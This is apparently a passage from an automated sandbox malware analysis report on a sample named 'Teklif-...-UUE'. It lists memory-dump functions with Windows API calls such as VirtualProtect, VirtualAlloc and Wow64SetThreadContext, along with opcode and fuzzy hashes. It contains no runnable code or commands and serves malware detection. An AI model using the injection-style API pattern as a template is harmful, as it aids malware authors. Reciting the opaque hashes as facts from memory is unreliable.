                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 05A0D63C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232473759.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5a00000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 2850c4624ba7827373d3d15c6398fb3c3b9341472acba583750ed0cdbf8e2cae
                                                          • Instruction ID: 970366c20322682ce8d739a72d55a1c014032ec2de6e64b1fc54fdd1a2aec4e2
                                                          • Opcode Fuzzy Hash: 2850c4624ba7827373d3d15c6398fb3c3b9341472acba583750ed0cdbf8e2cae
                                                          • Instruction Fuzzy Hash: 4531A8B9D102489FCF10CFA9D984A9EFBB5BF49310F10942AE819B7210D735A945CFA4
                                                          Function 0598E928 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0598E9D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 325478b9007e8bddfcffd16eaad3ff4962efb26bdbfc9f6e943318eefb6ba8d0
                                                          • Instruction ID: 4e50bec658db727a2f12a4af842b7ecd039b0c6e09b8ef630996f07ad24057b1
                                                          • Opcode Fuzzy Hash: 325478b9007e8bddfcffd16eaad3ff4962efb26bdbfc9f6e943318eefb6ba8d0
                                                          • Instruction Fuzzy Hash: 7131BBB5D002589FCB10DFAAD984AEEFBF5BF49310F14842AE419B7240C779A985CF94
                                                          Function 0598E921 Relevance: 1.6, APIs: 1, Instructions: 93threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0598E9D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 50ea2183e0913b74390c5a269755570e4fb4a01733a2a1925846741c3a5e8f05
                                                          • Instruction ID: 5ecfe21b3466d386534cfa9efccb89dabf6da42db3df4674ccc64cf28fd83f7b
                                                          • Opcode Fuzzy Hash: 50ea2183e0913b74390c5a269755570e4fb4a01733a2a1925846741c3a5e8f05
                                                          • Instruction Fuzzy Hash: FE41BAB5D002589FCB10DFA9D984AEEFBF5BF49310F14842AE419B7240C778A985CF54
                                                          Function 0598A770 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 994645edf268be44497b7276244a2e8357e143d1bed940ae911b1d1ca7d5c1e7
                                                          • Instruction ID: 6a0193f7826b22235e06454e6633355e04213d18fd937a021529c49d20a07535
                                                          • Opcode Fuzzy Hash: 994645edf268be44497b7276244a2e8357e143d1bed940ae911b1d1ca7d5c1e7
                                                          • Instruction Fuzzy Hash: 9131DBB4D012189FCB10DFAAD980AEEFBF5BF49310F10842AE805B7200C738A945CFA4
                                                          Function 0598A768 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: f68f60b34882f09cc7f3e8f692ba3b2344e6e95d3f8c4fadee07841f0b45eab4
                                                          • Instruction ID: 8bedb0264d6348155d0da4f1c90c68361fcb8e8a67e8e744f1cff91641ec0ee7
                                                          • Opcode Fuzzy Hash: f68f60b34882f09cc7f3e8f692ba3b2344e6e95d3f8c4fadee07841f0b45eab4
                                                          • Instruction Fuzzy Hash: 0231AAB9D012589FCB10CFA9D580AEEFBF5BF49310F24942AE815B7210D739A945CFA4
                                                          Function 05939D09 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: 2d00e622048f8c00789185ca35c1e712365a2f359353836eb93f77279c90ee54
                                                          • Instruction ID: 2c365e4c67c0885fef6ce81385940791b92a7e5fa635ffc4baf3afa9a01ea7f4
                                                          • Opcode Fuzzy Hash: 2d00e622048f8c00789185ca35c1e712365a2f359353836eb93f77279c90ee54
                                                          • Instruction Fuzzy Hash: 0FA1C834B10218DFCB04DFA4D899AADBBB6FF89300F558559E806AB365DB70EC46CB50
                                                          Function 05930B50 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: d05434ff98d447cbcf01943581fea0ad430bf6a6a9b1f491c9bf04e833d2e8a5
                                                          • Instruction ID: 5cd847ebe07c3fa6c083b6829ea6e5cc5e0062793e2022319b27730e406fbb24
                                                          • Opcode Fuzzy Hash: d05434ff98d447cbcf01943581fea0ad430bf6a6a9b1f491c9bf04e833d2e8a5
                                                          • Instruction Fuzzy Hash: 3C51AD31A00616CFCB00DF58C885A6AFBB6FF85320F168665E9199B391DB30F852CBD4
                                                          Function 0593EA18 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: a3a21a46c04715bc64161b7f9b8895b1f2535d372a5bdb888a7cb18eeceecdcc
                                                          • Instruction ID: d699cd2cc52e631fd9cbbb75358504469be1920717205fb72feee66923128f84
                                                          • Opcode Fuzzy Hash: a3a21a46c04715bc64161b7f9b8895b1f2535d372a5bdb888a7cb18eeceecdcc
                                                          • Instruction Fuzzy Hash: 67417036744114AFCB469FA8D815E5A7FB6FF89320B1A80A5F205DB372CA31EC11DB54
                                                          Function 0593D9B7 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: 2c768a823c3762920049d9635d358c2a8403a8c057d9e780508509fcdc97144d
                                                          • Instruction ID: 6920ab23d32be364705e04a4da6626bda13bd2fddc60a3c028f24745984aa2b0
                                                          • Opcode Fuzzy Hash: 2c768a823c3762920049d9635d358c2a8403a8c057d9e780508509fcdc97144d
                                                          • Instruction Fuzzy Hash: 0E416034B10614CFCB04AF64C8A9AADB7BBEFC9700F104519D442AB3A4CFB4AD46CB91
                                                          Function 00790870 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <dtq
                                                          • API String ID: 0-3090548385
                                                          • Opcode ID: acf9ffedee3b9fff4afbb0d9bf42f1133171b317ace8717fcf17cac55107a0a2
                                                          • Instruction ID: 2f478714333c51c6abd04282cce0dfe191bf0f5e97e1bf5c16e34968028e1478
                                                          • Opcode Fuzzy Hash: acf9ffedee3b9fff4afbb0d9bf42f1133171b317ace8717fcf17cac55107a0a2
                                                          • Instruction Fuzzy Hash: B8414B71B28115CFEF04DB68E4449BDB7F6BB48320B208166E50AEB362D738AD41DBD1
                                                          Function 05939188 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: 63c75a4ef0ee1e9ff10a53caafc292bc875390aa3920a94f87f1c69e51302d7a
                                                          • Instruction ID: 5da6e1bdbf173880a1731acf2396e58366585986637ae1cd3092f08fa2b2a1dc
                                                          • Opcode Fuzzy Hash: 63c75a4ef0ee1e9ff10a53caafc292bc875390aa3920a94f87f1c69e51302d7a
                                                          • Instruction Fuzzy Hash: 54411135700204DFCB089F68D884E5EBFBBEF88310B058969E50A9B376CA75DC42CB90
                                                          Function 0079E330 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJbq
                                                          • API String ID: 0-1760495472
                                                          • Opcode ID: c7d7e5446a61c75aa72c0d0028882ea063f7aa4c1484ca00105f254ec9dca78a
                                                          • Instruction ID: 53a1a4be3753c29770e7e8a6e357d98a6d254d0f3d8e46d4075e6aa6913980e1
                                                          • Opcode Fuzzy Hash: c7d7e5446a61c75aa72c0d0028882ea063f7aa4c1484ca00105f254ec9dca78a
                                                          • Instruction Fuzzy Hash: C151E574E01208DFCB48DFA9E598AADBBF2FF89301F20846AE415A7360DB745945CF51
                                                          Function 05934330 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p<]q
                                                          • API String ID: 0-1327301063
                                                          • Opcode ID: de2f9e8b149fa2bce9268baf20d2981e09b4cc2a8e217a9a121a5f969f33dd43
                                                          • Instruction ID: 6c08e69a84f62a009f0bf98a0e9a388e2c79f6496b3b9883d0111a34f0a1cdcf
                                                          • Opcode Fuzzy Hash: de2f9e8b149fa2bce9268baf20d2981e09b4cc2a8e217a9a121a5f969f33dd43
                                                          • Instruction Fuzzy Hash: 5741BF36308144DFCB55CF29C889A6A7BE9FF89351B0A40A5F85ACB371DA35DC50CB20
                                                          Function 05930448 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: 46e3bd114cef1add7dbcf672a803450c907326020609212e3268eefb858f447f
                                                          • Instruction ID: 6d4f3c5d31a823928601101457bac133cd9da9a3d5228b41c765697e652642f0
                                                          • Opcode Fuzzy Hash: 46e3bd114cef1add7dbcf672a803450c907326020609212e3268eefb858f447f
                                                          • Instruction Fuzzy Hash: 8021D2363041559FE7045EA9D844AAE7B6BEFC9320B14813AF909CB391DE75DC02C7A0
                                                          Function 05A0E760 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05A0E7FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232473759.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5a00000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: b5f3f0596b85ed737d9526c0a7f00c1434a56591fb564735e62afa48424e1e27
                                                          • Instruction ID: e85fa092693fe94aecd648263511e00cadc22dec840874a4f5d5fc030f48a1a0
                                                          • Opcode Fuzzy Hash: b5f3f0596b85ed737d9526c0a7f00c1434a56591fb564735e62afa48424e1e27
                                                          • Instruction Fuzzy Hash: BC31B8B8D002489FCF10CFA9D884AAEFBB5FF49310F10942AE815B7210C735A945CFA4
                                                          Function 057C0D6C Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2230984646.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57c0000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: ab81c603d26fd6d18495e4eac8f08f88e9b4d9f0809fa7e27422399177eac937
                                                          • Instruction ID: dcd32d0db4f67bca0ebacd579596c3096a687b6a3dfdcb4c80f79967e9ced3a5
                                                          • Opcode Fuzzy Hash: ab81c603d26fd6d18495e4eac8f08f88e9b4d9f0809fa7e27422399177eac937
                                                          • Instruction Fuzzy Hash: 6D318B74D08259CFDB19CFA9D8086FEBFB2EB45300F0480AED015A7292C7386986DF81
                                                          Function 0596BBDB Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "
                                                          • API String ID: 0-123907689
                                                          • Opcode ID: 3271bc5ec847717f8fe58bc3a562433b790bbf4373c136a102940cb62618b01a
                                                          • Instruction ID: cdf8f2729c3e015a247aa3b666defbcbd626ffd84eab8cd7679e2320d61de50b
                                                          • Opcode Fuzzy Hash: 3271bc5ec847717f8fe58bc3a562433b790bbf4373c136a102940cb62618b01a
                                                          • Instruction Fuzzy Hash: FC215E74A05268CFDB60CF64C988BE9BBB2AB89305F1495DAD50DAB350DB719EC5CF00
                                                          Function 0585950B Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: &
                                                          • API String ID: 0-1010288
                                                          • Opcode ID: ca22771a4ce0c1003eb24d25e02c1c9ba0c0b2e69052bef2f66dfe4e47c74911
                                                          • Instruction ID: c440c6d644b7e97e8546f5f53ab92cd051b12aa2a244052ecb4c904e6a22a887
                                                          • Opcode Fuzzy Hash: ca22771a4ce0c1003eb24d25e02c1c9ba0c0b2e69052bef2f66dfe4e47c74911
                                                          • Instruction Fuzzy Hash: 4621A374A402288FCBA8DF29C855BDABBB1BF49305F1085EAD94AE7350DB745E81CF41
                                                          Function 0596B34C Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: abc6854250ca62622bd73fabfe0cf291ee00f243579e68b120288bc9a615307d
                                                          • Instruction ID: 551faeda14e9f92b96cec20c3662236d7b121f8668f7d2e5d61ed83a687f39b8
                                                          • Opcode Fuzzy Hash: abc6854250ca62622bd73fabfe0cf291ee00f243579e68b120288bc9a615307d
                                                          • Instruction Fuzzy Hash: 96119F74905269CFCB60DF28D988B9CB7F2EB48305F2484DAD40EB7251EB759A89CF04
                                                          Function 0585DC41 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 814d91696995bdcf4e38f5f347e765c174e4191c1c9f6f4100f10c1519768640
                                                          • Instruction ID: 673696d1992363683885eba0279a600e8e456c6c24db998c35a2b86394451c48
                                                          • Opcode Fuzzy Hash: 814d91696995bdcf4e38f5f347e765c174e4191c1c9f6f4100f10c1519768640
                                                          • Instruction Fuzzy Hash: D5010074A02218DFCB14EF68D885B9DBBF2EF4A314F104899E949A7351CB309E80CF02
                                                          Function 0596B70C Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :
                                                          • API String ID: 0-336475711
                                                          • Opcode ID: 998d697464ddfca3d42fcb741b2189e627abe68b9978d903569d3e8890c06a2e
                                                          • Instruction ID: de873fdaf9a3f90d7e6ae732eb82f9d35df16f42b3260ddc39835bd73663ace5
                                                          • Opcode Fuzzy Hash: 998d697464ddfca3d42fcb741b2189e627abe68b9978d903569d3e8890c06a2e
                                                          • Instruction Fuzzy Hash: 8B01BD74A46228DFEB65CF64C884B98BBB2FB09300F1091DAD50DB7280DB729E85CF00
                                                          Function 058502F3 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: l
                                                          • API String ID: 0-2517025534
                                                          • Opcode ID: 5f0b16c99645106378aa8bb4ae8029b22d3b14520d3d74efb4683d004243dc6d
                                                          • Instruction ID: 5d59d0ce88c3477a154660be5321c21080c53d2f1de3e5560655798dce8e6a52
                                                          • Opcode Fuzzy Hash: 5f0b16c99645106378aa8bb4ae8029b22d3b14520d3d74efb4683d004243dc6d
                                                          • Instruction Fuzzy Hash: 2CF0AF7491222CCFEB60DF64C889B9DBBB1BB08365F2095A9D809A6250DB345D808F11
                                                          Function 0596B3BE Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-3993045852
                                                          • Opcode ID: 96a3680731180b6a1afd274e6f5f0436ba9792223b0f9520b65bef2626679875
                                                          • Instruction ID: c7b464af7ac3423863f3889ff860fb2d66811961deaec2a068280aa682bd013f
                                                          • Opcode Fuzzy Hash: 96a3680731180b6a1afd274e6f5f0436ba9792223b0f9520b65bef2626679875
                                                          • Instruction Fuzzy Hash: 8CF01C3190061A9BCF11AF54C8106E9F772FF89304F108685EA4927210DB30AAA5DF80
                                                          Function 0593DC08 Relevance: .4, Instructions: 437COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15c21921016db556279f74319f92fbf782b30e1a3f667745d22b69bad4f20c90
                                                          • Instruction ID: 49438e176d641a8f36d0a2ea02a60a615529b262b2dd007ef383da6c0f78d572
                                                          • Opcode Fuzzy Hash: 15c21921016db556279f74319f92fbf782b30e1a3f667745d22b69bad4f20c90
                                                          • Instruction Fuzzy Hash: E012D734B00219CFCB14EF64C995AADB7B6BF89300F5185A8E54AAB365DB70ED85CF40
                                                          Function 05968CB8 Relevance: .4, Instructions: 404COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f588365b0721527b66f025349fb51e31f75c19617f4bbb9166222e46f5189297
                                                          • Instruction ID: f12c1ec7007f5e221d65812bf1374fcb6ff849f4347f95666fc7a3bb1a7f639e
                                                          • Opcode Fuzzy Hash: f588365b0721527b66f025349fb51e31f75c19617f4bbb9166222e46f5189297
                                                          • Instruction Fuzzy Hash: 54F0E53440E388DFC306CB78CC51199BFB59F47204F1881EAD8445B353C6325907DB92
                                                          Function 05969710 Relevance: .3, Instructions: 320COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec7f821707b569b2ab0213937a35744ffb440a70a4056631f99c6ea50129f9aa
                                                          • Instruction ID: 5eb7323c4bf473d6fdf2fbbbaf1373dc4359de8ce538f2055eddab4300d0c7f0
                                                          • Opcode Fuzzy Hash: ec7f821707b569b2ab0213937a35744ffb440a70a4056631f99c6ea50129f9aa
                                                          • Instruction Fuzzy Hash: 53E1E370A04218CFDB54EF68D994BADBBF6FB8A304F1480AAE409AB355DB305D85CF15
                                                          Function 05969700 Relevance: .3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: effbeac024b5dcc06f197bff1d37a68c46f610687b7abdc8c738ef283e56a95c
                                                          • Instruction ID: 21a371031942ceaac5561bedc3d926233871b34f102d186b7857cb6099035063
                                                          • Opcode Fuzzy Hash: effbeac024b5dcc06f197bff1d37a68c46f610687b7abdc8c738ef283e56a95c
                                                          • Instruction Fuzzy Hash: 82E1D270A00218CFDB54EF68D994BADBBF6FB8A304F1480AAE409AB355DB345D85CF15
                                                          Function 059698CD Relevance: .3, Instructions: 305COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76d38ac67b76a3fce9aaabcf6c0bc48243ccd92f2123e2fcf0dc1be890fbc41d
                                                          • Instruction ID: 4b38ac513ed5d8d080223ae0472d9fa6f259bc8b02759a03ca141305b9b989fe
                                                          • Opcode Fuzzy Hash: 76d38ac67b76a3fce9aaabcf6c0bc48243ccd92f2123e2fcf0dc1be890fbc41d
                                                          • Instruction Fuzzy Hash: D4E1D170A05218CFDB54EF68D894BADBBF6FB8A304F1480AAE409AB355DB345D85CF14
                                                          Function 0596647C Relevance: .3, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 799ac74a9b34398b4d1356c1e600d7a0febdf57d9b67fb1784ccf9df6514fc51
                                                          • Instruction ID: f50404d992a2e8d2f19344cbb8f94296a85d1302c46e225a7c55edbf9ada577c
                                                          • Opcode Fuzzy Hash: 799ac74a9b34398b4d1356c1e600d7a0febdf57d9b67fb1784ccf9df6514fc51
                                                          • Instruction Fuzzy Hash: AEC1C270A05228CFDB64DF28D958BE9BBF6FB4A304F1095E9D409A7254CB749E88CF05
                                                          Function 0593DBF8 Relevance: .2, Instructions: 233COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd497d1baf223930ecc4d0561a34d6562bff291f648393798e91331ad0c7373c
                                                          • Instruction ID: d096de65e260e91c692358d12a90d5e1576e3508f1bc5e6319919b26d06ce83f
                                                          • Opcode Fuzzy Hash: cd497d1baf223930ecc4d0561a34d6562bff291f648393798e91331ad0c7373c
                                                          • Instruction Fuzzy Hash: 5DA10A34B00215CFDB14DF64C995BA9BBB6BF89300F5085A8E44AAB365DF70AD85CF40
